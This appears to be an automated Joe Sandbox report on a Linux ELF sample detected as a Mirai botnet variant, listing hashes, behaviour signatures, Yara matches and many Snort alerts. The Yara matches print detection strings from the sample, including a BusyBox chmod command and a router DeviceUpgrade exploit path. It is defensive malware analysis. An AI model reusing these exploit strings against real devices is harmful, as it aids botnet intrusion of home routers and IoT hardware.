Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
t9lNEiD3ui.elf

Overview

General Information

Sample name:t9lNEiD3ui.elf
renamed because original name is a hash value
Original sample name:0a305a485936ad7b125fd7c290a0eb96.elf
Analysis ID:1450304
MD5:0a305a485936ad7b125fd7c290a0eb96
SHA1:c7e3cf74d777ab0f245e2490623cae64daf8b8cd
SHA256:3a8d62d46b4085e40a80a7595995da009984db3e75096580d4f3008d0a588272
Tags:32elfmirairenesas
Infos:

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Sample tries to kill multiple processes (SIGKILL)
Uses known network protocols on non-standard ports
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enumerates processes within the "proc" file system
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1450304
Start date and time:2024-06-01 18:15:14 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 47s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:t9lNEiD3ui.elf
renamed because original name is a hash value
Original Sample Name:0a305a485936ad7b125fd7c290a0eb96.elf
Detection:MAL
Classification:mal100.spre.troj.linELF@0/1@67/0
  • Report size exceeded maximum capacity and may have missing network information.
Command:/tmp/t9lNEiD3ui.elf
PID:6203
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
unstable_is_the_history_of_universe
Standard Error:
  • system is lnxubuntu20
  • wrapper-2.0 (PID: 6221, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
  • wrapper-2.0 (PID: 6222, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
  • wrapper-2.0 (PID: 6224, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
  • wrapper-2.0 (PID: 6225, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
    • xfpm-power-backlight-helper (PID: 6244, Parent: 6225, MD5: 3d221ad23f28ca3259f599b1664e2427) Arguments: /usr/sbin/xfpm-power-backlight-helper --get-max-brightness
  • wrapper-2.0 (PID: 6226, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
  • wrapper-2.0 (PID: 6227, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
  • xfconfd (PID: 6243, Parent: 6242, MD5: 4c7a0d6d258bb970905b19b84abcd8e9) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd
  • systemd New Fork (PID: 6253, Parent: 1860)
  • xfce4-notifyd (PID: 6253, Parent: 1860, MD5: eee956f1b227c1d5031f9c61223255d1) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/notifyd/xfce4-notifyd
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
t9lNEiD3ui.elfJoeSecurity_Mirai_5Yara detected MiraiJoe Security
    t9lNEiD3ui.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
      t9lNEiD3ui.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
        t9lNEiD3ui.elfMAL_ELF_LNX_Mirai_Oct10_1Detects ELF Mirai variantFlorian Roth
        • 0x10919:$x2: /bin/busybox chmod 777 * /tmp/
        • 0x10664:$s1: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
        • 0x105ec:$s3: POST /cdn-cgi/
        t9lNEiD3ui.elfMAL_ELF_LNX_Mirai_Oct10_2Detects ELF malware Mirai relatedFlorian Roth
        • 0x105ec:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A
        SourceRuleDescriptionAuthorStrings
        6203.1.00007fae84400000.00007fae84412000.r-x.sdmpJoeSecurity_Mirai_5Yara detected MiraiJoe Security
          6203.1.00007fae84400000.00007fae84412000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
            6203.1.00007fae84400000.00007fae84412000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              6203.1.00007fae84400000.00007fae84412000.r-x.sdmpMAL_ELF_LNX_Mirai_Oct10_1Detects ELF Mirai variantFlorian Roth
              • 0x10919:$x2: /bin/busybox chmod 777 * /tmp/
              • 0x10664:$s1: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
              • 0x105ec:$s3: POST /cdn-cgi/
              6203.1.00007fae84400000.00007fae84412000.r-x.sdmpMAL_ELF_LNX_Mirai_Oct10_2Detects ELF malware Mirai relatedFlorian Roth
              • 0x105ec:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A
              Click to see the 25 entries
              Timestamp:06/01/24-18:15:54.251831
              SID:2835222
              Source Port:35770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.261460
              SID:2829579
              Source Port:42000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.265326
              SID:2030092
              Source Port:57236
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.268249
              SID:2030092
              Source Port:50984
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.307074
              SID:2829579
              Source Port:58850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.241651
              SID:2025883
              Source Port:40554
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.307832
              SID:2829579
              Source Port:46636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.252468
              SID:2829579
              Source Port:45594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.240541
              SID:2030092
              Source Port:54536
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.260401
              SID:2829579
              Source Port:43740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.237757
              SID:2030092
              Source Port:37624
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.259281
              SID:2829579
              Source Port:44494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.264884
              SID:2030092
              Source Port:48322
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.253854
              SID:2835222
              Source Port:42030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.268202
              SID:2030092
              Source Port:40682
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.239333
              SID:2030092
              Source Port:50980
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.263107
              SID:2835222
              Source Port:52304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.238879
              SID:2030092
              Source Port:42554
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.254927
              SID:2829579
              Source Port:46710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.259084
              SID:2829579
              Source Port:34116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.251475
              SID:2829579
              Source Port:56050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.238118
              SID:2030092
              Source Port:60810
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.273912
              SID:2829579
              Source Port:35310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.259125
              SID:2829579
              Source Port:53256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.308094
              SID:2835222
              Source Port:36302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.252286
              SID:2829579
              Source Port:52362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.254181
              SID:2835222
              Source Port:44086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.307255
              SID:2829579
              Source Port:35724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.268096
              SID:2030092
              Source Port:45848
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.251747
              SID:2835222
              Source Port:40380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.237729
              SID:2030092
              Source Port:53384
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.251062
              SID:2835222
              Source Port:48658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.256517
              SID:2829579
              Source Port:55302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.266093
              SID:2030092
              Source Port:42032
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.247100
              SID:2025883
              Source Port:54366
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.238864
              SID:2025883
              Source Port:40456
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.256904
              SID:2835222
              Source Port:58434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.265423
              SID:2030092
              Source Port:55036
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.252388
              SID:2835222
              Source Port:53196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.305803
              SID:2829579
              Source Port:50172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.237601
              SID:2025883
              Source Port:44574
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.273782
              SID:2835222
              Source Port:46148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.261704
              SID:2829579
              Source Port:59268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.238079
              SID:2030092
              Source Port:43832
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.238523
              SID:2030092
              Source Port:58026
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.254680
              SID:2030092
              Source Port:34716
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.308237
              SID:2829579
              Source Port:45302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.239606
              SID:2030092
              Source Port:48026
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.252809
              SID:2829579
              Source Port:53806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.256311
              SID:2835222
              Source Port:32974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.260737
              SID:2829579
              Source Port:53226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.274230
              SID:2835222
              Source Port:55148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.273711
              SID:2835222
              Source Port:37362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.287347
              SID:2030092
              Source Port:47844
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.308066
              SID:2829579
              Source Port:57036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.240367
              SID:2030092
              Source Port:33706
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.239670
              SID:2025883
              Source Port:54808
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.259918
              SID:2829579
              Source Port:60760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.253083
              SID:2835222
              Source Port:55144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.245293
              SID:2025883
              Source Port:50556
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.265307
              SID:2030092
              Source Port:43646
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.241837
              SID:2030092
              Source Port:57174
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.240510
              SID:2025883
              Source Port:41746
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.306008
              SID:2829579
              Source Port:47108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.246748
              SID:2025883
              Source Port:37954
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.251427
              SID:2835222
              Source Port:40714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.306077
              SID:2835222
              Source Port:34742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.274356
              SID:2829579
              Source Port:46882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.275211
              SID:2829579
              Source Port:32910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.307179
              SID:2829579
              Source Port:37022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.246473
              SID:2025883
              Source Port:50956
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.287840
              SID:2829579
              Source Port:54832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.251612
              SID:2835222
              Source Port:38836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.261368
              SID:2835222
              Source Port:45138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.252324
              SID:2829579
              Source Port:41586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.262106
              SID:2835222
              Source Port:38672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.266817
              SID:2030092
              Source Port:55674
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.265106
              SID:2030092
              Source Port:36350
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.267923
              SID:2030092
              Source Port:55788
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.247051
              SID:2025883
              Source Port:53500
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.287981
              SID:2829579
              Source Port:39772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.305877
              SID:2829579
              Source Port:34924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.246697
              SID:2030092
              Source Port:55516
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.251906
              SID:2835222
              Source Port:33272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.254966
              SID:2030092
              Source Port:58512
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.275510
              SID:2829579
              Source Port:38772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.256278
              SID:2835222
              Source Port:37590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.267289
              SID:2030092
              Source Port:36068
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.246777
              SID:2025883
              Source Port:42388
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.273650
              SID:2829579
              Source Port:39250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.254035
              SID:2829579
              Source Port:50018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.240199
              SID:2025883
              Source Port:37886
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.253703
              SID:2835222
              Source Port:37980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.224465
              SID:2030092
              Source Port:58842
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.252700
              SID:2835222
              Source Port:47716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.245977
              SID:2030092
              Source Port:39866
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.244628
              SID:2030092
              Source Port:53316
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.267325
              SID:2030092
              Source Port:49916
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.238957
              SID:2030092
              Source Port:58070
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.259243
              SID:2829579
              Source Port:34126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.239313
              SID:2030092
              Source Port:52812
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.247342
              SID:2030092
              Source Port:36442
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.306634
              SID:2835222
              Source Port:36014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.305747
              SID:2835222
              Source Port:33730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.261842
              SID:2829579
              Source Port:59374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.267862
              SID:2030092
              Source Port:48376
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.254180
              SID:2030092
              Source Port:45154
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.246301
              SID:2025883
              Source Port:48698
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.238269
              SID:2025883
              Source Port:46164
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.238913
              SID:2030092
              Source Port:33194
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.266068
              SID:2030092
              Source Port:41658
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.246060
              SID:2025883
              Source Port:35452
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.238074
              SID:2025883
              Source Port:55982
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.272711
              SID:2030092
              Source Port:60438
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.274132
              SID:2829579
              Source Port:38926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.260018
              SID:2835222
              Source Port:35538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.255877
              SID:2835222
              Source Port:44130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.239397
              SID:2025883
              Source Port:48212
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.261023
              SID:2835222
              Source Port:57540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.268272
              SID:2030092
              Source Port:53164
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.275631
              SID:2835222
              Source Port:59058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.263159
              SID:2829579
              Source Port:42834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.287929
              SID:2829579
              Source Port:36728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.275319
              SID:2835222
              Source Port:40920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.307148
              SID:2835222
              Source Port:37048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.239470
              SID:2025883
              Source Port:47694
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.262015
              SID:2835222
              Source Port:34410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.239158
              SID:2030092
              Source Port:48614
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.239895
              SID:2025883
              Source Port:38226
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.308392
              SID:2835222
              Source Port:60204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.239435
              SID:2025883
              Source Port:44378
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.240636
              SID:2025883
              Source Port:39258
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.255917
              SID:2835222
              Source Port:54086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.308318
              SID:2835222
              Source Port:45824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.266407
              SID:2030092
              Source Port:40428
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.239735
              SID:2030092
              Source Port:49570
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.287413
              SID:2835222
              Source Port:60892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.306669
              SID:2835222
              Source Port:52088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.240104
              SID:2030092
              Source Port:42682
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.267200
              SID:2030092
              Source Port:41196
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.240252
              SID:2025883
              Source Port:50940
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.239857
              SID:2030092
              Source Port:43072
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.238762
              SID:2030092
              Source Port:35140
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.252020
              SID:2829579
              Source Port:51288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.255667
              SID:2829579
              Source Port:57142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.254890
              SID:2835222
              Source Port:60608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.307937
              SID:2829579
              Source Port:38026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.273986
              SID:2829579
              Source Port:48062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.308533
              SID:2829579
              Source Port:35508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.238679
              SID:2030092
              Source Port:59368
              Destination Port:80
